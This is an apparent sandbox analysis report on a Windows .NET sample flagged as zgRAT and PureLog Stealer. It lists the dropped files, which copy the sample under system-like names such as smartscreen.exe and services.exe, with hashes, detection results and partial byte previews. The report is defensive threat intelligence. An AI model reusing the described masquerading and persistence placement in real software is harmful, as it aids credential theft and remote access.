                                                                                                    Preview:cmdyTwMFdyCKGbDxGScXllrdLg0OJyB1hJCbJ4RITD1oqOT6ZmV7lbt049nx675pxLm7ZloMATEhuCw6M3zgcDQGaLgJQeMVHL1fmWgx8J7RXLG2MqkCIYNu4fhOEe5fHsajLRU0XBiTF9tOFo6k4KNs8HkGzSsdObKougq5WuoG03o5wSIaiVl6fslErNAETFFnyEei8BNJfG1EcoUhJS420NJC5lNItkxvyAGrxkchHbbY0gmD3d4AKMxl5bmWxEa5TGPbhmtj0XvYvuMZ9KOQpwlmNfwW7FtCBgFtRKfRtVKwaY0KPNWn0JPgfmNCzXlunsWOp

                                                                                                    C:\Program Files (x86)\Windows NT\smartscreen.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................T..........~s... ........@.. ....................................@.................................0s..K.......p............................................................................ ............... ..H............text....S... ...T.................. ..`.rsrc...p............V..............@....reloc...............Z..............@..B................`s......H...........,.......k........#..r.......................................0..........(.... ........8........E........*.......N...8....*(.... ....~....{....9....& ....8....(.... ....~....{l...:....& ....8....(.... ....~....{o...9....& ....8y......0.......... ........8........E....;...................G...86...~....(S... .... .... ....s....~....(W....... ....8....r...ps....z*....~....([...~....(_... ....<.... ....~....{....9f...& ....8[...8.... ....~....{....:B...& ....87...~....

                                                                                                    C:\Program Files (x86)\Windows NT\smartscreen.exe:Zone.Identifier

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\c5b4cb5e9653cc

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):203
                                                                                                    Entropy (8bit):5.667383457904253
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:Qy3qj+rCxatSAVK7WQNdpvVyPYLmvpP03gaf:Qy3q6rQbWUWkdBIALmRPPaf
                                                                                                    MD5:9A1F1A377F715548F79ECABEC54EAD9A
                                                                                                    SHA1:F7E22E0B2578DA0A9B54106571833BFD21DF9EF1
                                                                                                    SHA-256:B5E900458017C418DD845AA1D555121EB4590C6EAEF105356851A5CF95FDF4D7
                                                                                                    SHA-512:23DBFCD277629D362D7393C4D0DC6C7FE2F5C574C8C588C5F295FE46E82A338EE5729CF3EFB02CED0112B8EAA862F862459DAC3106F0A279530F9032589CC80E
                                                                                                    Malicious:false
                                                                                                    Preview:zPP872CggI0yeUV7n97DrFCHpY5Qslwb9hRTRzFLrj75yUg5NO97E3euNISi6wx5VYy7CCqy4wWIHGTV19CdlzXGDhGIggO4vCjafj2LiLCShVmGz7r6uTTgBs4e5hRYibXFg30RH05awEir59TjzRKbsDYwpYPA4ouF8gj5HZz3X3t6KMj6NrjQR5WdeDmtl5gIUctYaXc

                                                                                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................T..........~s... ........@.. ....................................@.................................0s..K.......p............................................................................ ............... ..H............text....S... ...T.................. ..`.rsrc...p............V..............@....reloc...............Z..............@..B................`s......H...........,.......k........#..r.......................................0..........(.... ........8........E........*.......N...8....*(.... ....~....{....9....& ....8....(.... ....~....{l...:....& ....8....(.... ....~....{o...9....& ....8y......0.......... ........8........E....;...................G...86...~....(S... .... .... ....s....~....(W....... ....8....r...ps....z*....~....([...~....(_... ....<.... ....~....{....9f...& ....8[...8.... ....~....{....:B...& ....87...~....

                                                                                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe:Zone.Identifier

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                    C:\Program Files\WindowsPowerShell\Configuration\Registration\27d1bcfc3c54e0

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):41
                                                                                                    Entropy (8bit):4.753774260662877
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:XsmnVTPPW2Ag:cmnVCng
                                                                                                    MD5:3AE5490F45DB209198E97DECB022743F
                                                                                                    SHA1:01BAAE785C8C44EC8AC571317EB0DD4D6F3984EE
                                                                                                    SHA-256:BA27B3825702D2AFD11810BA717EEE1837F12EF0DCFBC9F912F1F60CF8025F04
                                                                                                    SHA-512:DB76FB82E388807963164202FBC6CFAFEF9BB4EACF87A35E157E3C5DEE1DE40AB06E3ED60030226734558B5511988EF7B204D953A38491883DC661A529E98CC8
                                                                                                    Malicious:false
                                                                                                    Preview:vXD2bv1UuNc4ebCBxxkGwxZLz5Ote6tHjhxCDuFeE

                                                                                                    C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................T..........~s... ........@.. ....................................@.................................0s..K.......p............................................................................ ............... ..H............text....S... ...T.................. ..`.rsrc...p............V..............@....reloc...............Z..............@..B................`s......H...........,.......k........#..r.......................................0..........(.... ........8........E........*.......N...8....*(.... ....~....{....9....& ....8....(.... ....~....{l...:....& ....8....(.... ....~....{o...9....& ....8y......0.......... ........8........E....;...................G...86...~....(S... .... .... ....s....~....(W....... ....8....r...ps....z*....~....([...~....(_... ....<.... ....~....{....9f...& ....8[...8.... ....~....{....:B...& ....87...~....

                                                                                                    C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe:Zone.Identifier

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x471953c7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1310720
                                                                                                    Entropy (8bit):0.4221308841936005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                                    MD5:658934D3D918871B76EB9EAD737BD109
                                                                                                    SHA1:811E318C4C27101F12CBAAE02058AADCB8A63DEA
                                                                                                    SHA-256:F16CE34DACE190EFF9F94572BDE48C554D18780B3D4409D5164476BB5F2873F2
                                                                                                    SHA-512:5730A77FB4489F9469EE68EA6B334A07B8A5FB89D6659A615AB79BA6E83943458DB77807E85602DD37640121F7D36CD97F19698AEDFCF4D484FF689FB6FC6DE6
                                                                                                    Malicious:false
                                                                                                    Preview:G.S.... .......A.......X\...;...{......................0.!..........{A..4...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................h../.4...}..................~.%..4...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Recovery\66bd154ce6dd3f

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with very long lines (720), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):720
                                                                                                    Entropy (8bit):5.90190945805779
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:QM7rbMzDW7ioRHR5+IUQFjwi2tFjBAqq1e/t0ewbm2efnOfJa/zrTUmKzbVrK:Qy0zDGiqH6PWsi2fpl10ewMfnOfJa/HJ
                                                                                                    MD5:876D783F8FC9C31C70A5D217C980CE7D
                                                                                                    SHA1:2485A88315E9DCC39E1245AD4D60AB417B264036
                                                                                                    SHA-256:40D1A0315DD04842E576B9A5CB4E99C2EFC088CE21A0219E3CF65C1BBB43D624
                                                                                                    SHA-512:E6127E8E6C0FAEB61048D32EEE1E4B242F9F8DCBDEC649AEA9F1B7EEF669E2EA3BC360AA61F771FB3530B35D5B8E427669752A595605646CAD93FCB6B9459104
                                                                                                    Malicious:false
                                                                                                    Preview:JvAgihhXP0l6cfZYAv01m6cJ4W3HByUnMZbXBvKVAxOCjgifPEFxriGMS0lMnaVbg7tCDBXPle0ysajYxY17tg6nSOFKJ8rkbwfmwfbNqzMMsRe2RNYPiXsABGuz6NGmwQX547lS6nR3Tt5BtM36jcBDEelqvmRdtkab4j7TlGT5GyrRKsFtTJDUOT0aW5hTWxJtTdHKOjUdIG6PxTfCghJjgFNksh7qi9iSo88rl5fuyjLIWknCZexyokMNQgcrmo4JholyVyalCZu73FNH44RDMuoEwubFdyHKoCks9yrkELvPzPUKSUwsW07xAgCkXVHORkS1efHFMq9A8YPhaQwIBZxxFxsdwHMsDh7O6dpxMrfp16ylQfKHj9M2wevrwnSFdR6abAk7k85T3H6I8GNR7FIEUFccr7AiYaLkAXKP4MglD28ohmtpaBIYI1GViHPm7W5c6WIk67WujhBbGx5EOUIWSxcIRyqx74nq7fsLeJtcoYzkzoPuMLYmOiKI49TIQjxo3VekFujFlpr481Smi6kvfBbYVkQe0kLFlKqeKopclTAi0QJCqqjU8BJ23FPfdFOBdmTyKyc3RIKMB2iFaOxJA1HjAykEZJ9gE9FO7V12NpDz161BhKFPREAmetxWNXeHJnIBxTHFW55UyRsE7jhPEuP98dtNhfp0L5qNyzNNC92VIpyNBtYozOCZYIDUk4h1QFJ2leQI

                                                                                                    C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................T..........~s... ........@.. ....................................@.................................0s..K.......p............................................................................ ............... ..H............text....S... ...T.................. ..`.rsrc...p............V..............@....reloc...............Z..............@..B................`s......H...........,.......k........#..r.......................................0..........(.... ........8........E........*.......N...8....*(.... ....~....{....9....& ....8....(.... ....~....{l...:....& ....8....(.... ....~....{o...9....& ....8y......0.......... ........8........E....;...................G...86...~....(S... .... .... ....s....~....(W....... ....8....r...ps....z*....~....([...~....(_... ....<.... ....~....{....9f...& ....8[...8.... ....~....{....:B...& ....87...~....

                                                                                                    C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe:Zone.Identifier

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1830
                                                                                                    Entropy (8bit):5.3661116947161815
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HKGHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj0qGqZ4vtd
                                                                                                    MD5:F3475F6FF1F713C7C9DAACC1DF623E58
                                                                                                    SHA1:AED39B5923CCC56514F33B73DF64A13706CE0DAE
                                                                                                    SHA-256:3AE4E8E8ADBD758B6E39EA3D7B8E680F3160F6E5D48DAF1F0419236F1978CDCE
                                                                                                    SHA-512:65B0309ABFBEFD2A749F3DEDBEE74CF5160BF42049C8A67AE30DB786092EC3553F1C8F16C5C40004650CB3926C84F061E37C796CA92266F582B3E48D5A237C32
                                                                                                    Malicious:true
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TItoGxsDkTEZBWdlQNGwopi.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
